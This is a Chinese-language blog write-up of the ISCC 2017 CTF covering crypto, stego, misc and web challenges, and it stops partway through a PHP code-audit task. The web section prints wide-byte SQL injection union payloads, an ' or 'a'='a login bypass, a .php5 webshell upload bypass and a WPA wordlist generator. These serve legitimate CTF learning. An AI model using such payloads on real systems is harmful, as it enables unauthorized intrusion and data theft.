<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="WriteUp,CTF," />








  <link rel="shortcut icon" type="image/x-icon" href="https://github.com/Windylh/image/raw/master/icon.ico?v=5.1.0" />






<meta name="description" content="在表哥的推荐下尝试了一下Iscc CTF，记录一下自己的答题过程。
BasicWheel Cipher附件：Basic-01.zip">
<meta property="og:type" content="article">
<meta property="og:title" content="IsccCTF WriteUp">
<meta property="og:url" content="http://yoursite.com/2017/05/26/IsccCTF WriteUp/index.html">
<meta property="og:site_name" content="Windylh's blog">
<meta property="og:description" content="在表哥的推荐下尝试了一下Iscc CTF，记录一下自己的答题过程。
BasicWheel Cipher附件：Basic-01.zip">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Basic3.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Misc.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Misc5.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/web4-1.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/web4-2.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Web2.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Re1-1.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Re1-2.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Re1-3.png">
<meta property="og:updated_time" content="2018-11-01T10:53:31.939Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="IsccCTF WriteUp">
<meta name="twitter:description" content="在表哥的推荐下尝试了一下Iscc CTF，记录一下自己的答题过程。
BasicWheel Cipher附件：Basic-01.zip">
<meta name="twitter:image" content="https://github.com/Windylh/image/raw/master/2017.5.5/Basic3.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/05/26/IsccCTF WriteUp/"/>





  <title> IsccCTF WriteUp | Windylh's blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Windylh's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/05/26/IsccCTF WriteUp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Windylh">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://raw.githubusercontent.com/Windylh/image/master/logo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Windylh's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                IsccCTF WriteUp
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-05-26T00:00:00+08:00">
                2017-05-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2017/05/26/IsccCTF WriteUp/" class="leancloud_visitors" data-flag-title="IsccCTF WriteUp">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>在表哥的推荐下尝试了一下Iscc CTF，记录一下自己的答题过程。</p>
<h2 id="Basic"><a href="#Basic" class="headerlink" title="Basic"></a>Basic</h2><h3 id="Wheel-Cipher"><a href="#Wheel-Cipher" class="headerlink" title="Wheel Cipher"></a>Wheel Cipher</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Basic/Basic-01.zip" target="_blank" rel="external">Basic-01.zip</a><br><a id="more"></a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">加密表：</div><div class="line">1:  &lt; ZWAXJGDLUBVIQHKYPNTCRMOSFE &lt;</div><div class="line">2:  &lt; KPBELNACZDTRXMJQOYHGVSFUWI &lt;</div><div class="line">3:  &lt; BDMAIZVRNSJUWFHTEQGYXPLOCK &lt;</div><div class="line">4:  &lt; RPLNDVHGFCUKTEBSXQYIZMJWAO &lt;</div><div class="line">5:  &lt; IHFRLABEUOTSGJVDKCPMNZQWXY &lt;</div><div class="line">6:  &lt; AMKGHIWPNYCJBFZDRUSLOQXVET &lt;</div><div class="line">7:  &lt; GWTHSPYBXIZULVKMRAFDCEONJQ &lt;</div><div class="line">8:  &lt; NOZUTWDCVRJLXKISEFAPMYGHBQ &lt;</div><div class="line">9:  &lt; XPLTDSRFHENYVUBMCQWAOIKZGJ &lt;</div><div class="line">10: &lt; UDNAJFBOWTGVRSCZQKELMXYIHP &lt;</div><div class="line">11： &lt; MNBVCXZQWERTPOIUYALSKDJFHG &lt;</div><div class="line">12： &lt; LVNCMXZPQOWEIURYTASBKJDFHG &lt;</div><div class="line">13： &lt; JZQAWSXCDERFVBGTYHNUMKILOP &lt;</div><div class="line"></div><div class="line">密钥为：2，3，7，5，13,12,9，1，8，10，4，11，6</div><div class="line">密文为：NFQKSEVOQOFNP</div></pre></td></tr></table></figure></p>
<p>根据题目找到资料：<a href="https://en.wikipedia.org/wiki/Jefferson_disk" target="_blank" rel="external">杰斐逊密码盘</a></p>
<p>处理加密表<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">2:  &lt; NACZDTRXMJQOYHGVSFUWIKPBEL &lt;</div><div class="line">3:  &lt; FHTEQGYXPLOCKBDMAIZVRNSJUW &lt;</div><div class="line">7:  &lt; QGWTHSPYBXIZULVKMRAFDCEONJ &lt;</div><div class="line">5:  &lt; KCPMNZQWXYIHFRLABEUOTSGJVD &lt;</div><div class="line">13: &lt; SXCDERFVBGTYHNUMKILOPJZQAW &lt;</div><div class="line">12: &lt; EIURYTASBKJDFHGLVNCMXZPQOW &lt;</div><div class="line">9:  &lt; VUBMCQWAOIKZGJXPLTDSRFHENY &lt;</div><div class="line">1:  &lt; OSFEZWAXJGDLUBVIQHKYPNTCRM &lt;</div><div class="line">8:  &lt; QNOZUTWDCVRJLXKISEFAPMYGHB &lt;</div><div class="line">10: &lt; OWTGVRSCZQKELMXYIHPUDNAJFB &lt;</div><div class="line">4:  &lt; FCUKTEBSXQYIZMJWAORPLNDVHG &lt;</div><div class="line">11: &lt; NBVCXZQWERTPOIUYALSKDJFHGM &lt;</div><div class="line">6:  &lt; PNYCJBFZDRUSLOQXVETAMKGHIW &lt;</div></pre></td></tr></table></figure></p>
<p>找有意义字符串</p>
<p>flag：<code>FIREINTHEHOLE</code></p>
<h3 id="你猜猜。。"><a href="#你猜猜。。" class="headerlink" title="你猜猜。。"></a>你猜猜。。</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Basic/Basic-04.zip" target="_blank" rel="external">Basic-04.zip</a></p>
<p>打开附件中的txt,出现了一堆16进制的数字，看到头开的<code>504B</code>，猜测是压缩包。</p>
<p>用winhex储存为压缩包，发现里面含有一个加密的flag.txt，用工具暴力破解，得到zip密码为<code>123456</code>，打开txt得到flag。<br>flag：<code>daczcasdqwdcsdzasd</code></p>
<h3 id="公邮密码"><a href="#公邮密码" class="headerlink" title="公邮密码"></a>公邮密码</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Basic/Basic-08.zip" target="_blank" rel="external">Basic-08.zip</a> </p>
<p>解压得到加密zip和一个名为<code>pw WINDoWsSEViCEss</code>，15位，大小写都有，猜测培根密码。<br>解密得<code>BIT</code>，解压zip，得到txt内容为<code>RmxhZzp7THkzMTkuaTVkMWYqaUN1bHQhfQ==</code>，<br>base64解密。<br>flag：<code>Flag:{Ly319.i5d1f*iCult!}</code></p>
<h3 id="神秘图片"><a href="#神秘图片" class="headerlink" title="神秘图片"></a>神秘图片</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Basic/Basic-03.zip" target="_blank" rel="external">Basic-03.zip</a></p>
<p>得到一张png，放在binwalk中分析，发现还有一张png，提取出来</p>
<p><img src="https://github.com/Windylh/image/raw/master/2017.5.5/Basic3.png" alt="basic3"></p>
<p>得到猪圈(共济会)密码的密文，按照百度百科解密即可</p>
<p>flag：<code>goodluck</code></p>
<h3 id="告诉你个秘密"><a href="#告诉你个秘密" class="headerlink" title="告诉你个秘密"></a>告诉你个秘密</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Basic/Basic-02.zip" target="_blank" rel="external">Basic-02.zip</a></p>
<p>给出了含有16进制数字的txt，<a href="http://www.ab126.com/goju/1711.html" target="_blank" rel="external">16进制转ascii</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">cjV5RyBscDlJIEJqTSB0RmhC</div><div class="line">VDZ1aCB5N2lKIFFzWiBiaE0g</div></pre></td></tr></table></figure>
<p>base64解码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">r5yG lp9I BjM tFhB</div><div class="line">T6uh y7iJ QsZ bhM</div></pre></td></tr></table></figure></p>
<p>键盘围起来的键：<code>TONGYUAN</code><br>flag:<code>TONGYUAN</code></p>
<h3 id="PHP-encrypt-1"><a href="#PHP-encrypt-1" class="headerlink" title="PHP_encrypt_1"></a>PHP_encrypt_1</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/raw/Isccctf2017/Basic/Basic-09.zip" target="_blank" rel="external">Basic-09.zip</a></p>
<p>给出了密文<code>fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=</code>和php的加密代码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">encrypt</span><span class="params">($data,$key)</span></span></div><div class="line">&#123;</div><div class="line">    $key = md5(<span class="string">'ISCC'</span>);</div><div class="line">    $x = <span class="number">0</span>;</div><div class="line">    $len = strlen($data);</div><div class="line">    $klen = strlen($key);</div><div class="line">    <span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; $len; $i++) &#123; </div><div class="line">        <span class="keyword">if</span> ($x == $klen)</div><div class="line">        &#123;</div><div class="line">            $x = <span class="number">0</span>;</div><div class="line">        &#125;</div><div class="line">        $char .= $key[$x];</div><div class="line">        $x+=<span class="number">1</span>;</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; $len; $i++) &#123;</div><div class="line">        $str .= chr((ord($data[$i]) + ord($char[$i])) % <span class="number">128</span>);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">return</span> base64_encode($str);</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>python解密脚本<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> base64</div><div class="line"><span class="keyword">import</span> hashlib</div><div class="line"></div><div class="line">s=<span class="string">'fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA='</span></div><div class="line">s=base64.b64decode(s)</div><div class="line">key=hashlib.md5(<span class="string">'ISCC'</span>).hexdigest()</div><div class="line">flag=<span class="string">''</span></div><div class="line">char=<span class="string">''</span></div><div class="line">x=<span class="number">0</span></div><div class="line">l=len(s)</div><div class="line">klen=len(key)</div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,l):</div><div class="line">    <span class="keyword">if</span>(x==klen):</div><div class="line">        x=<span class="number">0</span></div><div class="line">    char=char+key[x]</div><div class="line">    x=x+<span class="number">1</span></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,l):</div><div class="line">    <span class="keyword">if</span>(ord(s[i])-ord(char[i])&lt;<span class="number">0</span>):</div><div class="line">        flag=flag+chr(ord(s[i])+<span class="number">128</span>-ord(char[i]))</div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        flag=flag+chr(ord(s[i])-ord(char[i]))</div><div class="line"><span class="keyword">print</span> flag</div></pre></td></tr></table></figure></p>
<h3 id="二维码"><a href="#二维码" class="headerlink" title="二维码"></a>二维码</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Basic/Basic-07.zip" target="_blank" rel="external">Basic-07.zip</a></p>
<p>一张二维码图片，先扫描得到<code>The password of the router is our flag</code></p>
<p>直接改文件后缀名变成zip,解压，得到另一个加密的zip文件。</p>
<p>用zip爆破工具爆破，密码是<code>20161114</code></p>
<p>解压，有一个cap文件和一个txt，txt内容为<code>前四位是ISCC 后四位由大写字母和数字构成</code>，用EWSA工具字典爆破。</p>
<p>python生成字典：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">s= <span class="string">r'1234567890QWERTYUIOPASDFGHJKLZXCVBNM'</span></div><div class="line">ss=<span class="string">'ISCC'</span></div><div class="line">f=open(<span class="string">'dic.txt'</span>,<span class="string">'w'</span>)</div><div class="line"><span class="keyword">for</span> a <span class="keyword">in</span> s:</div><div class="line">    <span class="keyword">for</span> b <span class="keyword">in</span> s:</div><div class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> s:</div><div class="line">            <span class="keyword">for</span> d <span class="keyword">in</span> s:</div><div class="line">                ss=ss+a+b+c+d</div><div class="line">                f.write(ss)</div><div class="line">                f.write(<span class="string">'\n'</span>)</div><div class="line">                ss=<span class="string">'ISCC'</span></div><div class="line">f.close()</div></pre></td></tr></table></figure></p>
<p>用ESWA工具爆破得到flag：<code>ISCC168A</code></p>
<h2 id="Mobile"><a href="#Mobile" class="headerlink" title="Mobile"></a>Mobile</h2><h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="眼见非实"><a href="#眼见非实" class="headerlink" title="眼见非实"></a>眼见非实</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Misc/Misc-02.zip" target="_blank" rel="external">Misc-02.zip</a></p>
<p>题目给出一个word文档，结果没办法用word打开，用ue查看，发现文件头是PK，直接解压。在文件夹中搜索flag关键字即可。</p>
<p>flag：<code>flag{F1@g}</code></p>
<h3 id="就在其中"><a href="#就在其中" class="headerlink" title="就在其中"></a>就在其中</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Misc/Misc-03.zip" target="_blank" rel="external">Misc-03.zip</a></p>
<p>题目给的pcapng用wireshark分析，在tcp协议中看到了PK开头的16进制，提取保存zip发现有key.txt,却提取失败。用binwalk直接提取全部，去掉看起来无用的部分，剩下了一个zip，zip中提取的key.txt，一个.key文件，key文件中存在rsa私钥。</p>
<p><a href="http://www.cnblogs.com/aLittleBitCool/archive/2011/09/22/2185418.html" target="_blank" rel="external">利用openssl进行RSA加密解密</a></p>
<p>运用openssl解密<br><code>openssl rsautl -decrypt -inkey AC76.key -in key.txt -out 1.txt</code></p>
<p>打开生成的1.txt。</p>
<p>flag：<code>haPPy_Use_0penSsI</code></p>
<h3 id="很普通的Disco"><a href="#很普通的Disco" class="headerlink" title="很普通的Disco"></a>很普通的Disco</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Misc/Misc-04.zip" target="_blank" rel="external">Misc-04.zip</a></p>
<p>一道mp3隐写题，用<code>GoldWave</code>打开，分析波形，转到最前面发现有一部分奇怪的波形。<br><img src="https://github.com/Windylh/image/raw/master/2017.5.5/Misc.png" alt="misc4"><br>将单声道波形提取出来，接近1的变成1，接近-1的变成0，得到二进制</p>
<p><code>11001101101100110000111001111111011101011101100001010111010101011001101110101110111011011101111001111110</code></p>
<p><a href="http://www.ab126.com/goju/1711.html" target="_blank" rel="external">二进制转ascii码</a></p>
<p>flag:<code>flag{W0W*funny}</code></p>
<h3 id="很普通的数独"><a href="#很普通的数独" class="headerlink" title="很普通的数独"></a>很普通的数独</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Misc/Misc-05.zip" target="_blank" rel="external">Misc-05.zip</a></p>
<p>解压出25个数独的图片，但是并不用做数独，将有数字的部分填充为黑色，没有数字保持白色，25个图，5*5构成一个二维码。<br><img src="https://github.com/Windylh/image/raw/master/2017.5.5/Misc5.png" alt="Misc5"><br>扫描得base64<code>Vm0xd1NtUXlWa1pPVldoVFlUSlNjRlJVVGtOamJGWnlWMjFHVlUxV1ZqTldNakZIWVcxS1IxTnNhRmhoTVZweVdWUkdXbVZHWkhOWGJGcHBWa1paZWxaclpEUmhNVXBYVW14V2FHVnFRVGs9</code></p>
<p>多次base64解码。</p>
<p>flag：<code>flag{y0ud1any1s1}</code></p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Web签到题，来和我换flag啊！"><a href="#Web签到题，来和我换flag啊！" class="headerlink" title="Web签到题，来和我换flag啊！"></a>Web签到题，来和我换flag啊！</h3><p>如题目所说，web的签到题，脑洞题。</p>
<p>查看源代码<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">name</span>=<span class="string">"flag"</span> <span class="attr">action</span>=<span class="string">"index.php"</span> <span class="attr">method</span>=<span class="string">"post"</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"hiddenflag"</span> <span class="attr">value</span>=<span class="string">""</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"flag"</span> <span class="attr">value</span>=<span class="string">"Let's change flag"</span>&gt;</span></div><div class="line">    <span class="tag">&lt;/<span class="name">br</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"换FLAG!"</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></div></pre></td></tr></table></figure></p>
<p>有一个隐藏的<code>hiddenflag</code>变量，直接在文本框输入<code>f1ag</code>，返回<code>哼,就给我一个flag我才不和你换呢</code>，看来<code>hiddenflag</code>也需要赋值，返回<code>还不够诚意,不和你换FLAG</code>，这里出了一个大写的<code>FLAG</code>，猜测这个也需要赋值，构造post参数<code>hiddenflag=f1ag&amp;flag=f1ag&amp;FLAG=f1ag</code>，返回<code>这样才有诚意,flag给你吧!</code>，但是页面并没有显示什么，burpsuite抓包，发现在http响应头中有了<code>f1ag: {N0w_go1Odo!otherw3b}</code></p>
<h3 id="WelcomeToMySQL"><a href="#WelcomeToMySQL" class="headerlink" title="WelcomeToMySQL"></a>WelcomeToMySQL</h3><p>打开链接是一个文件上传的php，随便上传了一张图片，返回了上传路径<code>upload/xxxx</code>,并有一个提示<code>hint:$servername,$username,$password,$db,$tb is set in ../base.php</code>,那就试试上传shell吧，只要上传<code>.php</code>就会有js弹窗，<code>%00</code>等等绕过也没办法。</p>
<p>经表哥指点，有一种 <strong>php5</strong> 的神奇的php文件格式，上传通过，用C刀链接。找到<code>base.php</code>。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">    $servername=<span class="string">"localhost"</span>;</div><div class="line">    $username=<span class="string">"iscc2017"</span>;</div><div class="line">    $password=<span class="string">"iscc2017"</span>;</div><div class="line">    $db=<span class="string">"flag"</span>;</div><div class="line">    $tb=<span class="string">"flag"</span>;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>存放的应该是mysql的登录信息了，用C刀自带的数据库管理功能登陆，在数据库中找到flag。<br><code>Flag:{Iscc_1s_Fun_4nd_php_iS_Easy}</code></p>
<h3 id="where-is-your-flag"><a href="#where-is-your-flag" class="headerlink" title="where is your flag"></a>where is your flag</h3><p>用burpsuite抓包，发现网站的编码是gbk，显示<code>******flag is in flag</code>，访问flag.php，<code>hint:thisisflag</code>。</p>
<p>网站的编码是gbk，猜测是宽字节注入。</p>
<p>在网站加上<code>?id=2</code>，字符串<code>******flag is in flag</code>消失了，确定了是sql注入。</p>
<p>报错：<code>?id=1%df%27</code></p>
<p>查询列数：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">?id=1%df%27 order by 1,2 --+ 正确</div><div class="line">?id=1%df%27 order by 1,2,3 --+ 报错</div></pre></td></tr></table></figure></p>
<p>查询数据库名：<code>?id=1%df%27 union select 1,group_concat(schema_name) FROM information_schema.schemata --+  information_schema,web_robots</code></p>
<p>查询表名：<code>?id=1%df%27 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --+   article,flag</code></p>
<p>查询列名：<code>?id=1%df%27 union select 1,group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() --+   id,content,id,thisisflag</code></p>
<p>出现了thisisflag，跟flag.php提示我们的一样，我们就去查这个字段。</p>
<p>查询字段：<code>?id=1%df%27 union select 1,concat(thisisflag) FROM flag--+</code>，返回<code>Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for operation &#39;UNION&#39;</code>，用union函数查询的时候，表的编码与网页的编码不同，无法输出。</p>
<p>利用<code>hex()</code>函数将输出的内容转化为16进制，再转化回来。<br>payload：<code>?id=1%bf%27 union select 1,hex(concat(thisisflag)) From flag --+</code><br>得到16进制<code>666C61673A7B34343162376661313631373330376265393633323236336134343937383731657D</code><br>flag：<code>flag:{441b7fa1617307be9632263a4497871e}</code></p>
<h3 id="我们一起来日站"><a href="#我们一起来日站" class="headerlink" title="我们一起来日站"></a>我们一起来日站</h3><p>打开题目，提示我们寻找网站后台。试过了一些简单的<code>/admin/</code>之类的都是404，经表哥提示，找到了<code>robots.txt</code>，访问得到<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">#</div><div class="line"># robots.txt </div><div class="line">#</div><div class="line">User-agent: * </div><div class="line">Disallow: /21232f297a57a5a743894a0e4a801fc3/</div><div class="line">Disallow: /api</div></pre></td></tr></table></figure></p>
<p>进入<code>http://139.129.108.53:5090/web-04/21232f297a57a5a743894a0e4a801fc3/</code>，提示寻找继续寻找<code>admin page</code>，这里直接<code>admin.php</code>就找到了后台。<br>用burpsuite抓包，发现存在sql漏洞<br><img src="https://github.com/Windylh/image/raw/master/2017.5.5/web4-1.png" alt="web4-1"><br>运用万能密码<code>&#39;or &#39;a&#39;=&#39;a</code> (<a href="http://www.hack80.com/thread-22463-1-1.html" target="_blank" rel="external">常用万能密码</a>)<br><img src="https://github.com/Windylh/image/raw/master/2017.5.5/web4-2.png" alt="web4-2"><br><code>Flag:{ar32wefafafqw325t4rqfcafas}</code></p>
<h3 id="自相矛盾"><a href="#自相矛盾" class="headerlink" title="自相矛盾"></a>自相矛盾</h3><p>php代码审计题，先看源代码,因为运行的代码只输出nope，看不出执行到了那一步，所以我改了一下在本地测试。</p>
<p>代码如下：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$flag=<span class="string">"flag!!!!!!"</span>;</div><div class="line">$v1=<span class="number">0</span>;$v2=<span class="number">0</span>;$v3=<span class="number">0</span>;</div><div class="line">$a=(<span class="keyword">array</span>)json_decode(@$_GET[<span class="string">'iscc'</span>]); <span class="comment">#get方法读入iscc，json化。</span></div><div class="line"></div><div class="line"><span class="keyword">if</span>(is_array($a))&#123;</div><div class="line">    is_numeric(@$a[<span class="string">"bar1"</span>])?<span class="keyword">die</span>(<span class="string">"nope1"</span>):<span class="keyword">NULL</span>;</div><div class="line">    <span class="keyword">if</span>(@$a[<span class="string">"bar1"</span>])&#123;</div><div class="line">        ($a[<span class="string">"bar1"</span>]&gt;<span 